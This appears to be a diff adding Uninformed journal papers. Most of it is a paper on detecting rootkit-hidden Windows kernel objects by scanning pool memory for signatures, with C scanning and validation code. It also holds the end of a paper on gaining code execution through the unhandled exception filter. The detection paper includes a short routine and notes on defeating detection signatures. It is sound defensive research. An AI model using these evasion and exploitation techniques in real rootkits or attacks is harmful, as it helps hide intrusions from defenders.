objects that are placed in a specific allow list. This isn't a very common
configuration, and is also limited by which COM objects can be instantiated,
thus making it not particularly feasible. However, it is thought that other,
more feasible techniques may exist to accomplish this.
Aside from IIS, the authors are also of the opinion that this attack vector
could be applied to many of the Microsoft Office applications, such as Excel
and Word. These suites are thought to be vulnerable due to the fact that they
permit the instantiation and embedding of arbitrary COM objects in the document
files. If it were possible to come up with a way to control the loading and
unloading of DLLs through these instantiations, it may be possible to take
advantage of the flaw outlined in this paper. One particular way in which this
may be possible is through the use of macros, but this has a lesser severity
because it would require some form of user interaction to permit the execution
of macros.
Another interesting application that may be susceptible to this attack is
Microsoft SQL server. Due to the fact that SQL server has features that permit
the loading and unloading of DLLs, it may be possible to leverage a SQL
injection attack in a way that makes it possible to gain control of the
top-level UEF by causing certain DLLs to be loaded and unloaded However, given
the ability to load DLLs, there are likely to be other techniques that can be
used to gain code execution as well. Once that occurs, a large query with
predictable results could be used as a mechanism to spray the heap. This type
of attack could even be accomplished through something as innocuous as a
website that is merely backed against the SQL server. Remember, attack vectors
aren't always direct.
8) Conclusion
The title of this paper implies that an attacker has the ability to leverage
code execution of bugs that would otherwise not be useful, such as NULL pointer
dereferences. To that point, this paper has illustrated a technique that can
be used to gain control of the top-level unhandled exception filter for an
application by making the registration and deregistration process asymmetrical.
Once the top-level UEF has been made to point to invalid memory, an attacker
can use techniques like heap-spraying to attempt to place attacker controlled
code at the location that the now-defunct top-level UEF resided at. Assuming
this can be accomplished, an attacker simply needs to be able to trigger an
unhandled exception to cause the execution of arbitrary code.
The crux of this attack vector is in leveraging a design flaw in the
assumptions made by the way the unhandled exception filter ``chain'' is
maintained. In particular, the design assumes that calls made to register, and
subsequently deregister, an unhandled exception filter through
kernel32!SetUnhandledExceptionFilter will be done symmetrically. However, this
cannot always be controlled, as DLLs that register unhandled exception filters
are not always guaranteed to be loaded and unloaded in a symmetric fashion. If
an attacker is capable of controlling the order in which DLLs are loaded and
unloaded, then they may be capable of gaining arbitrary code execution through
this technique, such as was illustrated in the Internet Explorer case study in
chapter .
While not feasible in most cases, this technique has been proven to work in at
least one critical application: Internet Explorer. Going forward, other
applications, such as IIS, may also be found to be susceptible to this attack
vector. All it will take is a little creativity and the right set of
conditions.
Bibliography
[1] Conover, Matt and Oded Horovitz. Reliable Windows Heap Exploits.
http://cansecwest.com/csw04/csw04-Oded+Connover.ppt; accessed
May 6, 2006.
[2] Kazienko, Przemyslaw and Piotr Dorosz. Hacking an SQL Server.
http://www.windowsecurity.com/articles/HackinganSQLServer.html;
accessed May 7, 2006.
[3] Litchfield, David. Windows Heap Overflows.
http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt;
accessed May 6, 2006.
[4] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!).
http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx;
accessed May 6, 2006.
[5] Microsoft Corporation. UnhandledExceptionFilter.
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/unhandledexceptionfilter.asp;
accessed May 6, 2006.
[6] Microsoft Corporation. SetUnhandledExceptionFilter.
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/setunhandledexceptionfilter.asp;
accessed May 6, 2006.
[7] Murphy, Matthew. Windows Media Player Plug-In Embed Overflow;
http://www.milw0rm.com/exploits/1505; accessed May
7, 2006.
[8] SkyLined. InternetExploiter.
http://www.edup.tudelft.nl/ bjwever/exploits/InternetExploiter2.zip;
accessed May 7, 2006.

1004
uninformed/4.6.txt Normal file

File diff suppressed because it is too large Load Diff

821
uninformed/4.7.txt Normal file
View File

@ -0,0 +1,821 @@
GREPEXEC: Grepping Executive Objects from Pool Memory
bugcheck
chris@bugcheck.org
1) Foreword
Abstract:
As rootkits continue to evolve and become more advanced, methods that can be
used to detect hidden objects must also evolve. For example, relying on system
provided APIs to enumerate maintained lists is no longer enough to provide
effective cross-view detection. To that point, scanning virtual memory for
object signatures has been shown to provide useful, but limited, results. The
following paper outlines the theory and practice behind scanning memory for
hidden objects. This method relies upon the ability to safely reference the
Windows system virtual address space and also depends upon the building and
locating effective memory signatures. Using this method as a base, suggestions
are made as to what actions might be performed once objects are detected. The
paper also provides a simple example of how object-independent signatures can be
built and used to detect several different kernel objects on all versions of
Windows NT+. Due to time constraints, the source code associated with this
paper will be made publicly available in the near future.
Thanks:
Thanks to skape, Peter, and the rest of the uninformed hooligans;
you guys and gals rock!
Disclaimer:
The author is not responsible for how the papers contents are used
or interpreted. Some information may be inaccurate or incorrect. If
the reader feels any information is incorrect or has not been
properly credited please contact the author so corrections can be
made. All content refers to the Windows XP Service Pack 2
platform unless otherwise noted.
2) Introduction
As rootkits become increasingly popular and more sophisticated than
ever before, detection methods must also evolve. While rootkit
technologies have evolved beyond API hooking methods, detectors have
also evolved beyond the hook detection ages. At first
rootkits such as FU were detected using various methods
which exploited its weak and proof-of-concept design by applications
such as Blacklight. These specific weaknesses were
addressed in FUTo. However, some still remain excluding
the topic of this paper.
RAIDE, a rootkit detection tool, uses a memory
signature scanning method in order to find EPROCESS blocks hidden by
FUTo. This specific implementation works, however, it too has its
weaknesses. This paper attempts to outline the general concepts of
implementing a successful rootkit detection method using memory
signatures.
The following chapters will discuss how to safely enumerate system
memory, what to look for when building a memory signature, what to
do once a memory signature has been found, and potential methods of
breaking memory signatures. Finally, an accompanying tool will be used
to concretely illustrate the subject of this paper.
After reading the following paper, the reader should have an
understanding of the concepts and issues related to kernel object
detection using memory signatures. The author believes this to be an
acceptable method of rootkit detection. However, as with most things
in the security realm, no one technique is the ultimate solution and
this technique should only be considered complimentary to other known
detection methods.
3) Scanning Memory
Enumerating arbitrary system memory is nowhere near a science since
its state can change at anytime while you are attempting to access
it. While this is true, the memory that surrounds kernel executive
objects should be fairly consistent. With proper care, memory accesses
should be safe and the chance of false positives and negatives should be
fairly minimal. The following sections will outline a safe method to
enumerate the contents of both the system's PagedPool and
NonPagedPool.
3.1) Retrieving Pool Ranges
For the purpose of enumerating pool memory it is unnecessary to
enumerate the entire system address space. The system maintains a
few global variables such as nt!MmPagedPoolStart,
nt!MmPagedPoolEnd and related NonPagedPool
variables that can be used in order to speed up a search and reduce
the possibility of unnecessary false positives. Although these
global variables are not exported, there are a couple ways in that
they can be obtained.
The most reliable method on modern systems (Windows XP Service Pack 2
and up) is through the use of the KPCR->KdVersionBlock pointer located
at fs:[0x34]. This points to a KDDEBUGGER_DATA64 structure which is
defined in the Debugging Tools For Windows SDK header file wdbgexts.h.
This structure is commonly used by malicious software in order to gain
access to non-exported global variables to manipulate the system.
A second method to obtain PagedPool values is to reference the
per-session nt!_MM_SESSION_SPACE found at EPROCESS->Session. This contains
information about the session owning the process, including its ranges
and many other PagedPool related values shown here.
kd> dt nt!_MM_SESSION_SPACE
+0x01c NonPagedPoolBytes : Uint4B
+0x020 PagedPoolBytes : Uint4B
+0x024 NonPagedPoolAllocations : Uint4B
+0x028 PagedPoolAllocations : Uint4B
+0x044 PagedPoolMutex : _FAST_MUTEX
+0x064 PagedPoolStart : Ptr32 Void
+0x068 PagedPoolEnd : Ptr32 Void
+0x06c PagedPoolBasePde : Ptr32 _MMPTE
+0x070 PagedPoolInfo : _MM_PAGED_POOL_INFO
+0x244 PagedPool : _POOL_DESCRIPTOR
While enumerating the entire system address space is not preferable, it
can still be used in situations where pool information cannot be
obtained. The start of the system address space can be assumed to be
any address above nt!MmHighestUserAddress. However, it would appear
that an even safer assumption would be the address following the
LARGE_PAGE where ntoskrnl.exe and hal.dll are mapped. This can be
obtained by using any address exported by hal.dll and rounding up to the
nearest large page.
3.2) Locking Memory
When accessing arbitrary memory locations, it is important that pages be
locked in memory prior to accessing them. This is done to ensure that
accessing the page can be done safely and will not cause an exception
due to a race condition, such as if it were to be de-allocated between a
check and a reference. The system provides a routine to lock pages
named nt!MmProbeAndLockPages. This routine can be used to lock either
pagable or non-paged memory. Since physical pages maintain a reference
count in the nt!MmPfnDatabase there is no worry of an outside source
unlocking the pages and having them page out to disk or become invalid.
In order to use MmProbeAndLockPages, a caller must first build an MDL
structure using something such as nt!IoAllocateMdl or
nt!MmInitializeMdl. The MDL creation routines are passed a virtual
address and length describing the block of virtual memory to be
referenced. On a successful call to nt!MmProbeAndLockPages, the virtual
address range described by the MDL structure is safe to access. Once the
block is no longer needed to be accessed, the pages must be unlocked
using nt!MmUnlockPages.
A trick can be used to further reduce the number of pages locked when
enumerating the NonPagedPool. As documented, MmProbeAndLockPages can be
called at DISPATCH_LEVEL with the limitation of it only being allowed to
lock resident memory pages and failing otherwise, which is a desirable
side-effect in this case.
4) Detecting Executive Objects
In general, all of the executive components of the NT kernel rely on the
object manager in order to manage the objects they allocate. All objects
allocated by the object manager have a common header named OBJECT_HEADER
and additional optional headers such as OBJECT_HEADER_NAME_INFO, process
quota information, and handle trace information. Let's take a look to
see what is common to all executive objects and how we can use the pool
block header information to identify an allocated executive object.
Lastly, some object specific information will be discussed in terms of
generating a useful memory signature for an object.
4.1) Generic Object Information
Since the OBJECT_HEADER is common to all objects, let's look at it in
detail. A static field here refers to all objects of specific type, not
all executive objects in the system.
kd> dt _OBJECT_HEADER
+0x000 PointerCount : Int4B
+0x004 HandleCount : Int4B
+0x004 NextToFree : Ptr32 Void
+0x008 Type : Ptr32 _OBJECT_TYPE
+0x00c NameInfoOffset : UChar
+0x00d HandleInfoOffset : UChar
+0x00e QuotaInfoOffset : UChar
+0x00f Flags : UChar
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : Ptr32 Void
+0x014 SecurityDescriptor : Ptr32 Void
+0x018 Body : _QUAD
-------------------+------------+-------------------------------------
PointerCount | Variable | of references
HandleCount | Variable | of open handles
NextToFree | NotValid | Used when freed
Type | Static | Pointer to OBJECTTYPE
NameInfoOffset | Static | 0 or offset to related header
HandleInfoOffset | Static | 0 or offset to related header
QuotaInfoOffset | Static | 0 or offset to related header
Flags | NotCertain | Not certain
ObjectCreateInfo | Variable | Pointer to OBJECTCREATEINFORMATION
QuotaBlockCharged | NotCertain | Not certain
SecurityDescriptor | Variable | Pointer to SECURITYDESCRIPTOR
Body | NotValid | Union with the actual object
-------------------+------------+-------------------------------------
From this it is assumed that the most reliable and unique signature is
the Type field of the OBJECT_HEADER which could be used in order to
identify objects of a specific type such as EPROCESS, ETHREAD,
DRIVER_OBJECT, and DEVICE_OBJECT objects.
4.2) Validating Pool Block Information
Kernel pool management appears to be slightly different from usermode
heap management. However, if one assumes that the only concern is
dealing with pool memory allocations which are less then PAGE_SIZE, it is
fairly similar. Each call to ExAllocatePoolWithTag() returns a
pre-buffer header as follows:
kd> dt _POOL_HEADER
+0x000 PreviousSize : Pos 0, 9 Bits
+0x000 PoolIndex : Pos 9, 7 Bits
+0x002 BlockSize : Pos 0, 9 Bits
+0x002 PoolType : Pos 9, 7 Bits
+0x000 Ulong1 : Uint4B
+0x004 ProcessBilled : Ptr32 _EPROCESS
+0x004 PoolTag : Uint4B
+0x004 AllocatorBackTraceIndex : Uint2B
+0x006 PoolTagHash : Uint2B
For the purposes of locating objects, the following is a breakdown of
what could be useful. Again, static refers to fields common between similar
executive objects and not all allocated POOL_HEADER structures.
------------------------+------------+----------------------------------
PreviousSize | Variable | Offset to previous pool block
PoolIndex | NotCertain | Not certain
BlockSize | Static | Size of pool block
PoolType | Static | POOL_TYPE
Ulong1 | Union | Padding, not valid
ProcessBilled | Variable | Allocator EPROCESS when no Tag specified
PoolTag | Static | Pool Tag (ULONG)
AllocatorBackTraceIndex | NotCertain | Not certain
PoolTagHash | NotCertain | Not certain
------------------------+------------+----------------------------------
The POOL_HEADER contains several fields that appear to be common to similar
objects which could be used to further verify the likelihood of
locating an object of a specific type such as BlockSize, PoolType, and
PoolTag.
In addition to the mentioned static fields, two other fields,
PreviousSize and BlockSize, can be used to validate that the currently
assumed POOL_HEADER appears to be a valid, allocated pool block and is in
one of the pool managers maintained link lists. PreviousSize and
BlockSize are multiples of the minimum pool alignment which is 8 bytes
on a 32bit system and 16 bytes on a 64bit system. These two elements supply byte offsets to the
neighboring pool blocks.
If PreviousSize equals 0, the current POOL_HEADER should be the first
pool block in the pool's contiguous allocations. If it is not, it
should be the same as the previous POOL_HEADERs BlockSize. The
BlockSize should never equal 0 and should always be the same as the
proceeding POOL_HEADERs PreviousSize.
The following code validates a POOL_HEADER of an allocated pool block.
//
// Assumes BlockOffset < PAGE_SIZE
// ASSERTS Flink == Flink->Blink && Blink == Blink->Flink
//
BOOLEAN ValidatePoolBlock (
IN PPOOL_HEADER pPoolHdr,
IN VALIDATE_ADDR pValidator
) {
BOOLEAN bReturn = FALSE;
PPOOL_HEADER pPrev;
PPOOL_HEADER pNext;
pPrev = (PPOOL_HEADER)((PUCHAR)pPoolHdr
- (pPoolHdr->PreviousSize * sizeof(POOL_HEADER)));
pNext = (PPOOL_HEADER)((PUCHAR)pPoolHdr
+ (pPoolHdr->BlockSize * sizeof(POOL_HEADER)));
if
((
( pPoolHdr == pNext )
||( pValidator( pNext + sizeof(POOL_HEADER) - 1 )
&& pPoolHdr->BlockSize == pNext->PreviousSize )
)
&&
(
( pPoolHdr != pPrev )
||( pValidator( pPrev )
&& pPoolHdr->PreviousSize == pPrev->BlockSize )
))
{
bReturn = TRUE;
}
return bReturn;
}
4.3) Object Specific Signatures
So far a few useful signatures have been shown which apply to all
executive objects and could be used to identify them in memory. For some
cases these may be enough to be effective. However, in other cases, it
may be necessary to examine information within the object's body itself
in order to identify them. It should be noted that some objects of
interest may be clearly defined and documented while others may not be.
Furthermore, executive object definitions may vary between OS versions.
The following subsections briefly outline obvious memory signatures for
a few objects which generally are of interest when identifying
rootkit-like behavior. A few examples of object-specific signatures
will also be discussed, some of which have been used in previous work.
4.3.1) Process Objects
Here are just a few of the most basic EPROCESS fields which can form a
simple signature using rather predictable constant values which hold
true for all EPROCESS structures in the same system.
-----------------------------+------------------------------------------
Pcb.Header.Type | Dispatch header type number
Pcb.Header.Size | Size of dispatcher object
Pcb.Affinity | CPU affinity bit mask, typically CPU in system
Pcb.BasePriority | Typically the default of 8
Pcb.ThreadQuantum | Workstations is typically 18
ExitTime | 0 for running processes
UniqueProcessId | 0 if bitwise AND with 0xFFFF0002
SectionBaseAddress | Typically 0x00400000 for non-system executables
InheritedFromUniqueProcessId | Same as UniqueProcessId, typically a valid running pid
Session | Unique on a per-session basis
ImageFileName | Printable ASCII, typically ending in '.exe'
Peb | 0x7FF00000 if bitwise AND with 0xFFF00FFF
SubSystemVersion | XP Service Pack 2 is 0x400
-----------------------------+------------------------------------------
Note that there are several other DISPATCH_HEADERs embedded within
locks, events, timers, etc in the structure which also have a predicable
Header.Type and Header.Size.
4.3.2) Thread Objects
Here are just a few of the most basic ETHREAD fields which can form a
simple signature using rather predictable constant values which hold
true for all ETHREAD structures in the same system.
------------------+------------------------------------------------------
Tcb.Header.Type | Dispatch header type number
Tcb.Header.Size | Size of dispatcher object
Teb | 0x7FF00000 if bitwise AND with 0xFFF00FFF
BasePriority | Typically the default of 8
ServiceTable | nt!KeServiceDescriptorTable(Shadow) used by RAIDE
Affinity | CPU affinity bit mask, typically CPU in system
PreviousMode | 0 or 1, which is KernelMode or UserMode
Cid.UniqueProcess | 0 if bitwise AND with 0xFFFF0002
Cid.UniqueThread | 0 if bitwise AND with 0xFFFF0002
------------------+------------------------------------------------------
Note that there are several other DISPATCH_HEADERs embedded within
locks, events, timers, etc in the structure which also have a predicable
Header.Type and Header.Size.
4.3.3) Driver Objects
A tool written previously named MODGREPPER by Joanna Rutkowska of
invisiblethings.org used a signature based approach to detect hidden
DRIVER_OBJECTs. This signature was later 'broken' by valerino described
in a rootkit.com article titled "Please don't greap me!". Listed here
are a few fields which a signature could be built upon to detect
DRIVER_OBJECTs.
--------------+-----------------------------------------------------------
Type | I/O Subsystem structure type ID, should be 4
Size | Size of the structure, should be 0x168
DeviceObject | Pointer to a valid first created device object(can be NULL)
DriverSection | Pointer to a nt!_LDR_DATA_TABLE_ENTRY structure
DriverName | A UNICODE_STRING structure containing the driver name
--------------+-----------------------------------------------------------
The following fields of the DRIVER_OBJECT can be validated by assuring
they fall within the range of a loaded driver image such that:
DriverStart < FIELD < DriverStart + DriverSize.
--------------------+----------------------------------------------------
DriverInit | Address of DriverEntry() function
DriverUnload | Address of DriverUnload() function, can be NULL
MajorFunction[0x1c] | Dispatch handlers for IRPMJXXX, can default to ntoskrnl.exe
--------------------+----------------------------------------------------
4.3.4) Device Objects
For the DEVICE_OBJECT structure there are few static
signatures which are usable. Here are the only obvious ones.
-------------+----------------------------------------------------------
Type | I/O Subsystem structure type ID, should be 3
Size | Size of the structure, should be 0xb8
DriverObject | Pointer to a valid driver object
-------------+----------------------------------------------------------
Note that the DriverObject field must be valid in order for the device
to function.
4.3.5) Miscellaneous
So far the memory signatures discussed have been fairly straightforward
and for the most part are simply a binary comparison with a specific
value. Later in this paper, a technique called N-depth pointer
validation will be discussed as a method of developing a more effective
signature in situations where pointer based memory signatures are
attempted to be evaded.
Another way of considering an object field as a signature is to validate
it in terms of its characteristics instead of by its value. A common
example of this would be to validate an object field LIST_ENTRY.
Validating a LIST_ENTRY structure can be done as follows:
Entry == Entry->Flink->Blink == Entry->Blink->Flink.
A pointer to any object or memory allocation can also be checked using
the function shown previously, named ValidatePoolBlock. Even a
UNICODE_STRING.Buffer can be validated this way provided the allocation
is less than PAGE_SIZE.
5) Found An Object, Now What?
The question of what to do after potentially identifying an executive
object through a signature depends on what the underlying goal is. For
the purpose of a the sample utility included with this paper, the goal
may be to simply display some information about the objects as it finds
them.
In the context of a rootkit detector, however, there may be many more
steps that need to be taken. For example, consider a detector looking
for EPROCESS blocks which have been unlinked from the process linked
list or a driver module hidden from the system service API. In order to
determine this, some cross-view comparisons of the raw objects detected
and the output from an API call or a list enumeration is needed.
Detectors must also take into consideration the race condition of an
object being created or destroyed in between the memory enumeration and
the acquisition of the "known to the system" data.
Additionally, it may be desired that some additional sanity checks be
performed on these objects in addition to the signature. Do the object
fields x,y,z contain valid pointers? Is field c equal to b? Does this
object appear to be valid however has signs of tampering in order to
hide it? Does the number of detected objects match up with a global
count value such as the one maintained in an OBJECT_TYPE structure? The
following sections will briefly mention some random thoughts of what to
do with a suspected object of the four types previously mentioned in
this paper in Chapter 4.
5.1) Process Objects
Here is a brief list of things to check when scanning for EPROCESS
objects.
1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot.
2. Compare against a system call such as nt!NtQuerySystemInformation.
3. Compare against the EPROCESS->ActiveProcessLinks list.
4. Does the process have a valid list of threads?
5. Can PsLookupProcessByProcessId open its
6. UniqueProcessId?
7. Is ImageFileName a valid string? zeroed? garbage?
5.2) Thread Objects
Here is a brief list of things to check when scanning for ETHREAD
objects.
1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot.
2. Compare against a system call such as nt!NtQuerySystemInformation.
3. Does the process have a valid owning process?
4. Can PsLookupThreadByThreadId open its
5. Cid.UniqueThread?
6. What does Win32StartAddress point to? Is it a valid module address?
7. What is its ServiceTable value?
8. If it is in a wait state, for how long?
9. Where is its stack? What does its stack trace look like?
5.3) Driver Objects
Here is a brief list of things to check when scanning for DRIVER_OBJECT
objects.
1. Compare against services found in the service control manager database.
2. Compare against a system call such as nt!NtQuerySystemInformation.
3. Is the object in the global system namespace?
4. Does the driver own any valid device objects?
5. Does the drive base address point to a valid MZ header?
6. Do the object's function pointer fields look correct?
7. Does DriverSection point to a valid nt!LDRDATATABLEENTRY?
8. Does DriverName or the
9. LDR_DATA_TABLE_ENTRY have valid strings? zeroed? garbage?
5.4) Device Objects
Here is a brief list of things to check when scanning for DEVICE_OBJECT
objects.
1. Is the owning driver object valid?
2. Is the device named and is it mapped into the global namespace?
3. Does it appear to be in a valid device stack?
4. Are its Type and Size fields correct?
6) Breaking Signatures
Memory signatures can be an effective method of identifying allocated
objects and can serve as a low level baseline in order to detect objects
hidden by several different methods. Although the memory signature
detection method may be effective, it doesn't come without its own set
of problems. Many signatures can be evaded using several different
techniques and non-evadable signatures for objects, if any exist, have
yet to be explored. The following sections discuss issues and counter
measures related to defeating memory signatures.
6.1) Pointer Based Signatures
Using a memory signature which is a valid pointer to some common object
or static data is a very appealing signature to use for detection due to
its reliability, however is also an easy signature to bypass. The
following demonstrates the most simplistic method of bypassing the
OBJECT_HEADER->Type signature this paper uses as a generic object memory
signature. This is possible because the OBJECT_TYPE is just an allocated
structure of fairly stable data. Many pointer based signatures with
similar static characteristics are open to the same attack.
NTSTATUS KillObjectTypeSignature (
IN PVOID Object
)
{
NTSTATUS ntStatus = STATUS_SUCESS;
PVOID pDummyObject;
POBJECT_HEADER pHdr;
pHdr = OBJECT_TO_OBJECT_HEADER( Object );
pDummyObject = ExAllocatePool( sizeof(OBJECT_TYPE) );
RtlCopyMemory( pDummyObject, pHdr->Type, sizeof(OBJECT_TYPE) );
pHdr->Type = pDummyObject;
return STATUS_SUCCESS;
}
6.2) N-Depth Pointer Validation
As demonstrated in the previous section, pointer based signatures are
effective. However, in some cases, they may be trivial to bypass. The
following code demonstrates an example which does what this paper refers
to as N-depth pointer validation in an attempt to create a more complex,
and potentially more difficult to bypass, signature using pointers. The
following example is also evadable using the same principal of
relocation shown above.
The algorithm assumes a given address is an executive object and
attempts validation by performing the following steps:
1. Calculates an assumed OBJECT_HEADER
2. Assumes pObjectHeader->Type is an OBJECT_TYPE
3. Calculates an assumed OBJECT_HEADER for the OBJECT_TYPE
4. Assumes pObjectHeader->Type is nt!ObpTypeObjectType
5. Validates pTypeObject->TypeInfo.DeleteProcedure == nt!ObpDeleteObjectType
BOOLEAN ValidateNDepthPtrSignature (
IN PVOID Address,
IN VALIDATE_ADDR pValidate
)
{
PVOID pObject;
POBJECT_TYPE pTypeObject;
POBJECT_HEADER pHdr;
pHdr = OBJECT_TO_OBJECT_HEADER( Address );
if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE;
// Assume this is the OBJECT_TYPE for this assumed object
pTypeObject = pHdr->Type;
// OBJECT_TYPE's have headers too
pHdr = OBJECT_TO_OBJECT_HEADER( pTypeObject );
if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE;
// OBJECT_TYPE's have an OBJECT_TYPE of nt!ObpTypeObjectType
pTypeObject = pHdr->Type;
if( ! pValidate(&pTypeObject->TypeInfo.DeleteProcedure) ) return FALSE;
// \ObjectTypes\Type has a DeleteProcedure of nt!ObpDeleteObjectType
if( pTypeObject->TypeInfo.DeleteProcedure
!= nt!ObpDeleteObjectType ) return FALSE;
return TRUE;
}
6.3) Miscellaneous
An obvious method of preventing detection from memory scanning would be
to use what is commonly referred to as the Shadow Walker memory
subversion technique. If virtual memory is unable to be read then of
course a memory scan will skip over this area of memory. In the context
of pool memory, however, this may not be an easy attack since it may
create a situation where the pool appears corrupted which could lead to
crashes or system bugchecks. Of course, attacking a function like
nt!MmProbeAndLockPages or IoAllocateMdl globally or specifically in the
import address table of the detector itself would work.
For memory signatures based on constant or predicable values it may be
feasible to either zero out or change these fields and not disturb
system operation. For example take the author's enhancements to the FUTo
rootkit where it is seen that the EPROCESS->UniqueProcessId can be
safely cleared to 0 or previously mentioned rootkit.com article titled
"Please don't greap me!" which clears DRIVER_OBJECT->DriverName and its
associated buffer in order to defeat MODGREPPER.
For the case of some pointer signatures a simple binary comparison may
not be enough to validate it. Take the above example and using
nt!ObpDeleteObjectType. This could be defeated by overwriting
pTypeObject->TypeInfo.DeleteProcedure to point to a simple jump
trampoline which is allocated elsewhere which simple jumps back to
nt!ObpDeleteObjectType.
7) GrepExec: The Tool
Included with this paper is a proof-of-concept tool complete with source
which demonstrates scanning the pool for signatures to detect executable
objects. Objects detected are DRIVER_OBJECT, DEVICE_OBJECT, EPROCESS,
and ETHREAD. The tool does nothing to determine if an object has been
attempted to be hidden in any way. Instead, it simply displays found
objects to standard output. At this time the author has no plans to
continue work with this specific tool, however, there are plans to
integrate the memory scanning technique into another project. The source
code for the tool can be easily modified to detect other signatures
and/or other objects.
7.1) The Signature
For demonstration purposes the signature used is simple. All objects are
allocated in NonPagedPool so only non-paged memory is enumerated for the
search. The signature is detected as follows:
1. Enumeration is performed by assuming the start of a pool block.
2. The signature offset is added to this pointer.
3. The assumed signature is compared with the OBJECT_HEADER->Type
for the object type being searched for.
4. The assumed POOL_HEADER->PoolType is compared to the objects known
pool type.
5. The assumed POOL_HEADER is validated using the function
from section , ValidatePoolBlock.
The following is the function which sets up the parameters in order to
perform the pool enumeration and validation of a block by a single PVOID
signature. On a match, a callback is made using the pointer to the start
of the matching block. As an alternative to the PVOID signature, the
poolgrep.c code can easily be modified to accept either a structure to
several signatures and offsets or a validation function pointer in order
to perform a more complex signature validation.
NTSTATUS ScanPoolForExecutiveObjectByType (
IN PVOID Object,
IN FOUND_BLOCK_CB Callback,
IN PVOID CallbackContext
) {
NTSTATUS ntStatus = STATUS_SUCCESS;
POBJECT_HEADER pObjHdr;
PPOOL_HEADER pPoolHdr;
ULONG_PTR blockSigOffset;
ULONG_PTR blockSignature;
pObjHdr = OBJECT_TO_OBJECT_HEADER( Object );
pPoolHdr = OBJHDR_TO_POOL_HEADER( pObjHdr );
blockSigOffset = (ULONG_PTR)&pObjHdr->Type - (ULONG_PTR)pObjHdr
+ OBJHDR_TO_POOL_BLOCK_OFFSET(pObjHdr);
blockSignature = (ULONG_PTR)pObjHdr->Type;
(VOID)ScanPoolForBlockBySignature( pPoolHdr->PoolType - 1,
0, // pPoolHdr->PoolTag OPTIONAL,
blockSigOffset,
blockSignature,
Callback,
CallbackContext );
return ntStatus;
}
7.2) Usage
GrepExec usage is pretty straightforward. Here is the output of the
help command.
**********************************************************
GREPEXEC 0.1 * Grepping executive objects from the pool *
Author: bugcheck
Built on: May 30 2006
**********************************************************
Usage: grepexec.exe [options]
--help, -h Displays this information
--install, -i Manually install driver
--uninstall, -u Manually uninstall driver
--status, -s Display installation status
--process, -p GREP process objects
--thread, -t GREP thread objects
--driver, -d GREP driver objects
--device, -e GREP device objects
7.3) Sample Output
The standard output is also straight forward. Here is a sample of each
supported command.
C:\grepexec>grepexec.exe -p
EPROCESS=81736C88 CID=0354 NAME: svchost.exe
EPROCESS=8174E238 CID=0634 NAME: explorer.exe
EPROCESS=81792020 CID=027c NAME: winlogon.exe
...
C:\grepexec>grepexec.exe -t
EPROCESS=817993C0 ETHREAD=815D4A58 CID=0778.077c wscntfy.exe
EPROCESS=8174AA88 ETHREAD=815D6860 CID=0408.0678 svchost.exe
EPROCESS=819CA830 ETHREAD=815F3B30 CID=0004.0368 System
EPROCESS=81792020 ETHREAD=81600398 CID=027c.0460 winlogon.exe
...
C:\grepexec>grepexec.exe -d
DRIVER=81722DA0 BASE=F9B5C000 \FileSystem\NetBIOS
DRIVER=819A4B50 BASE=F983D000 \Driver\Ftdisk
DRIVER=81725DA0 BASE=00000000 \Driver\Win32k
DRIVER=81771880 BASE=F9EB4000 \Driver\Beep
...
C:\grepexec>grepexec.exe -e
DEVICE=81733860 \Driver\IpNat NAME: IPNAT
DEVICE=81738958 \Driver\Tcpip NAME: Udp
DEVICE=817394B8 \Driver\Tcpip NAME: RawIp
DEVICE=81637CE0 \FileSystem\Srv NAME: LanmanServer
...
8) Conclusion
From reading this paper the reader should have a good understanding of
the concepts and issues related to scanning memory for signatures in
order to detect objects in the system pool. The reader should be able
to enumerate system memory safely, construct their own customized memory
signatures, locate signatures in memory, and implement their own
reporting mechanism.
It is obvious that object detection using memory scanning is no exact
science. However, it does provide a method which, for the most part,
interacts with the system as little as possible. The
author believes that the outlined technique can be successfully
implemented to obtain acceptable results in detecting objects hidden by
rootkits.
Bibliography
Blackhat.com. RAIDE: Rootkit Analysis Identification Elimination.
http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Silberman-Butler.pdf;
Accessed May. 30, 2006.
F-Secure. Blacklight.
http://www.f-secure.com/blacklight/;
Accessed May. 30, 2006.
Invisiblethings.org. MODGREPPER.
http://www.invisiblethings.org/tools.html;
Accessed May. 30, 2006.
Phrack.org. Shadow Walker.
http://www.phrack.org/phrack/63/p63-0x08_Raising_The_Bar_For_Windows_Rootkit_Detection.txt;
Accessed May. 30, 2006.
Rootkit.com. FU.
http://rootkit.com/project.php?id=12;
Accessed May. 30, 2006.
Rootkit.com. Please don't greap me!.
http://rootkit.com/newsread.php?newsid=316;
Accessed May. 30, 2006.
Uninformed.org. futo.
http://uninformed.org/?v=3&a=7&t=sumry;
Accessed May. 30, 2006.
Windows Hardware Developer Central. Debugging Tools for Windows.
http://www.microsoft.com/whdc/devtools/debugging/default.mspx;
Accessed May. 30, 2006.

2070
uninformed/4.8.txt Normal file

File diff suppressed because it is too large Load Diff

30
uninformed/4.txt Normal file
View File

@ -0,0 +1,30 @@
Engineering in Reverse
Improving Automated Analysis of Windows x64 Binaries
skape
As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can be performed prior to doing code or data flow analysis can be useful in getting a better understanding for how a binary operates. To that point, this paper gives a brief explanation of some of the changes that have been made to support Windows x64 binaries. From there, a few basic techniques are illustrated that can be used to improve the process of identifying functions, annotating their stack frames, and describing their exception handler relationships. Source code to an example IDA plugin is also included that shows how these techniques can be implemented.
txt | code.tgz | pdf | html
Exploitation Technology
Exploiting the Otherwise Non-Exploitable on Windows
Skywing & skape
